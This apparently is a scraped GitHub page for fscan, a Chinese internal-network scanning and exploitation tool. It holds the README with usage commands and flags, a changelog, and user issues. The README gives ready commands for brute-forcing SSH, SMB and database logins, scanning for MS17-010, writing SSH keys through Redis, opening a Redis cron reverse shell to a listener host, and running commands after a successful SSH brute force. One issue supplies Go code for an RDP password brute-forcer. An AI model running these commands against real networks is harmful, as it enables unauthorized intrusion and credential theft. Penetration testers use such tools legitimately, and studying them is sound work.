一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

fscan

简介

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描等。

主要功能

1.信息搜集:

  • 存活探测(icmp)
  • 端口扫描

2.爆破功能:

  • 各类服务爆破(ssh、smb等)
  • 数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

  • 获取目标网卡信息
  • 高危漏洞扫描(ms17010等)

4.Web探测功能:

  • webtitle探测
  • web指纹识别(常见cms、oa框架等)
  • web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

  • redis写公钥或写计划任务
  • ssh命令执行

6.其他功能:

  • 文件保存

usege

简单用法

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

其他用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)

编译命令

go build -ldflags="-s -w " -trimpath

完整参数

   -Num int
        poc rate (default 20)
  -c string
        exec command (ssh)
  -cookie string
        set poc cookie
  -debug
        debug mode will print more error info
  -domain string
        smb domain
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
  -hf string
        host file, -hs ip.txt
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
        not to save output log
  -nopoc
        not to scan web vul
  -np
        not to ping
  -o string
        Outputfile (default "result.txt")
  -p string
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")
  -ping
        using ping replace icmp
  -pocname string
        use the pocs these contain pocname, -pocname weblogic
  -proxy string
        set poc proxy, -proxy http://127.0.0.1:8080
  -pwd string
        password
  -pwdf string
        password file
  -rf string
        redis file to write sshkey file (as: -rf id_rsa.pub)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666)
  -t int
        Thread nums (default 600)
  -time int
        Set timeout (default 3)
  -u string
        url
  -uf string
        urlfile
  -user string
        username
  -userf string
        username file
  -wt int
        Set web timeout (default 5)

运行截图

fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc

参考链接

https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc

最近更新

[+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描
[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml
[+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。
[+] 2021/2/5 修改icmp发包模式,更适合大规模探测。
修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理

Owner
影舞者
影舞者
https://github.com/shadow1ng/fscan
Comments
  • 编译出错

    编译出错

    D:\Code\Golang\fscan>go build -ldflags="-s -w " -trimpath

    runtime/cgo

    cgo: C compiler "gcc" not found: exec: "gcc": executable file not found in %PATH%

    下载昨天更新go.mod之后的版本出现了这个问题,3天前那版可以正常编译。

  • 编译报错

    编译报错

    师傅,我直接下载git源码,编译失败 go run main.go -h 提示 go: updates to go.mod needed; to update it: go mod tidy 然后我又运行go mod tidy 再次编译提示

    github.com/shadow1ng/fscan/Plugins

    Plugins/base.go:54:14: undefined: aes Plugins/base.go:60:15: undefined: cipher Plugins/base.go:65:9: undefined: base64 Plugins/base.go:69:19: undefined: base64 Plugins/base.go:72:14: undefined: aes Plugins/base.go:76:15: undefined: cipher Plugins/base.go:90:13: undefined: bytes

  • poc-yaml-thinkadmin-v6-readfile environment creation error: unsupported type: *lib.UrlType

    poc-yaml-thinkadmin-v6-readfile environment creation error: unsupported type: *lib.UrlType

    师傅,根据你的更新修改了相应的代码,但是报了这些错误。师傅知道怎么修改吗? 报错如下:

    [-] poc-yaml-metinfo-cve-2019-17418-sqli environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-minio-default-password environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-metinfo-lfi-cnvd-2018-13393 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-apache-httpd-cve-2021-40438-ssrf environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-apache-httpd-cve-2021-41773-rce environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-apache-httpd-cve-2021-41773-path-traversal environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-laravel-debug-info-leak environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-laravel-improper-webdir environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nextjs-cve-2017-16877 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-msvod-sqli environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-myucms-lfr environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10735 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10738 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-natshell-arbitrary-file-read environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-netentsec-icg-default-password environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-netentsec-ngfw-rce environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-netgear-cve-2017-5521 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-maccms-rce environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10737 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-bash-cve-2014-6271 environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-airflow-unauth environment creation error: unsupported type: *lib.UrlType [-] poc-yaml-nagio-cve-2018-10736 environment creation error: unsupported type: *lib.UrlType ……

  • 建议增加针对rdp的爆破功能

    建议增加针对rdp的爆破功能

    参考https://github.com/tomatome/grdp/ 可以很容易实现,代码太丑陋就不放了,给师傅个建议

    func RdpScan(info *common.HostInfo) (tmperr error) {
	if common.IsBrute {
		return
	}
	starttime := time.Now().Unix()
	for _, user := range common.Userdict["rdp"] {
		for _, pass := range common.Passwords {
			pass = strings.Replace(pass, "{user}", user, -1)
			port, err := strconv.Atoi(info.Ports)
			flag, err := RdpConn(info.Host, info.Domain, user, pass, port)
			if flag == true && err == nil {
				result := fmt.Sprintf("[+] RDP:%v:%v:%v %v", info.Host, info.Ports, user, pass)
				common.LogSuccess(result)
				return err
			} else {
				errlog := fmt.Sprintf("[-] rdp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
				common.LogError(errlog)
				tmperr = err
				if common.CheckErrs(err) {
					return err
				}
				if time.Now().Unix()-starttime > (int64(len(common.Userdict["rdp"])*len(common.Passwords)) * info.Timeout) {
					return err
				}
			}
		}
	}
	return tmperr
}

func RdpConn(ip, domain, login, password string, port int) (bool, error) {
	target := fmt.Sprintf("%s:%d", ip, port)
	err := grdp.Login(target, domain, login, password)

	if err != nil {
		return false, err
	}
	return true, err
}
  • 我一个朋友的一些建议

    我一个朋友的一些建议

    A: 你之前说最新的fscan有什么问题了?

    XXXXXX: 还是有乱码

    A: 还有其他吗

    XXXXXX: 指result.txt里面的乱码

    A: image

    A: 他只处理了这三种编码 ISO也很常见 没加进去

    XXXXXX: 原来如此,给他提个issue

    A: 自己改还快些

    A: image

    A: 除了443 其他都用http协议访问 难怪会漏报

    XXXXXX: 继续提issue

    XXXXXX: 让他两种都试试

    A: 我先看完吧 他后面有个函数好像能识别https的 另外还有处理

    A: 还真的是只识别443端口,另外就是302跳转他也只跳一次,昨天我爆破好几个站点都是跳三次的,虽然第一次登陆可能一般只会有一次跳转

    XXXXXX: 给他提issuse

    A: 你去啊

    A: 我不做伸手党

  • -np 禁ping时的BUG

    -np 禁ping时的BUG

    环境MAC(windows下正常)

    辛苦作者大大

    正常情况下:

    go run main.go -h 172.20.10.1/24

(Ping) Target '172.20.10.15' is alive
(Ping) Target '172.20.10.1' is alive
(Ping) Target '172.20.10.3' is alive
icmp alive hosts len is: 3
172.20.10.1:21 open

    -np下扫描导致错误,并且无法自动结束。

    go run main.go -h 172.20.10.1/24 -np

172.20.10.63:21 open
172.20.10.29:21 open
172.20.10.62:21 open
open result.txt: too many open files
open result.txt: too many open files
172.20.10.64:21 open
open result.txt: too many open files
172.20.10.54:21 open
open result.txt: too many open files
...
  • 表哥好 提示 undefined: MS17010EXP 与 not enough arguments in call to 错误

    表哥好 提示 undefined: MS17010EXP 与 not enough arguments in call to 错误

    PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go env -w GOPROXY=https://goproxy.cn,direct PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go mod tidy PS D:\0000\20211012\kill-free\fscan\2021-10-12\fscan-main\fscan-main> go build -ldflags="-s -w " -trimpath

    github.com/shadow1ng/fscan/Plugins

    Plugins\ms17010.go:133:4: undefined: MS17010EXP Plugins\scanner.go:16:28: not enough arguments in call to "github.com/shadow1ng/fscan/common".ParseIP have (string, string) want (string, string, string)

  • 目前使用1.5.1版本时,爆破ssh与smb存在问题

    目前使用1.5.1版本时,爆破ssh与smb存在问题

    目前在公司对一个B段进行内部安全排查,发现更新后的版本似乎SSH与SMB爆破结果都是空的。默认线程600,为了准确性我们将线程为100,依然获取不想预期的结果。账号,口令 (其中账号口令是已经确认的) 是通过参数指定,命令如下: ./fscan_amd64_upx -h 10.x.0.1/16 -user xxx -pwd xxx -t 100

  • 功能需求:希望能以字典格式添加额外的账号密码

    功能需求:希望能以字典格式添加额外的账号密码

    大概是这样的,虽然有userf pwdf两个参数,可以以字典格式添加账号密码。但是如果这么做,那就只能使用用户提供的账密字典,我感觉Fscan提供的默认账密字典还是非常好用的。

    但是如果要用usera 和 pwda这两个添加额外账号密码的参数,似乎只能指定一个?而且我自己试了一下似乎不支持导入txt字典,如果我想在Fscan原有的账密字典上添加多个用户名或多个密码,就会非常麻烦。

    所以希望作者大大能强化一下usera和pwda,让他们支持字典导入,或者直接新设参数,比如什么useraf、pwdaf啥的。

  • MAC OS Ventura 13.0.1 运行报错“segmentation fault”

    MAC OS Ventura 13.0.1 运行报错“segmentation fault” 

    ~/Desktop
❯ file fscan_darwin
fscan_darwin: Mach-O 64-bit executable x86_64

~/Desktop
❯ md5 ./fscan_darwin
MD5 (./fscan_darwin) = 702fc712074669bdae02e1092bcac785

~/Desktop
❯ ./fscan_darwin -h
[1]    7075 segmentation fault  ./fscan_darwin -h

    处理器:Intel Core

  • linux报错

    linux报错

    ./fscan1 ./fscan1: line 1: !DOCTYPE: No such file or directory ./fscan1: line 2: syntax error near unexpected token newline' ./fscan1: line 2: "http://www.w3.org/TR/html4/strict.dtd">'

  • mysql使用口令文件爆破问题

    mysql使用口令文件爆破问题

    使用 fscan64.exe -h 192.168.2.128 -m mysql -p 38080 -pwdf top100password.txt -userf top10W.txt 命令 结果为 [*] Icmp alive hosts len is: 1 192.168.2.128:38080 open [*] alive ports len is: 1 start vulscan [+] mysql:192.168.2.128:38080:test test 已完成 1/1 [*] 扫描结束,耗时: 440.2911ms

    仅使用了top100password.txt与top10W.txt的第一行用户名+密码就显示扫描完成并输出结果,而结果并不正确,尝试多个环境均出现这种情况,mysql版本为5.7

Related tags
Security fscan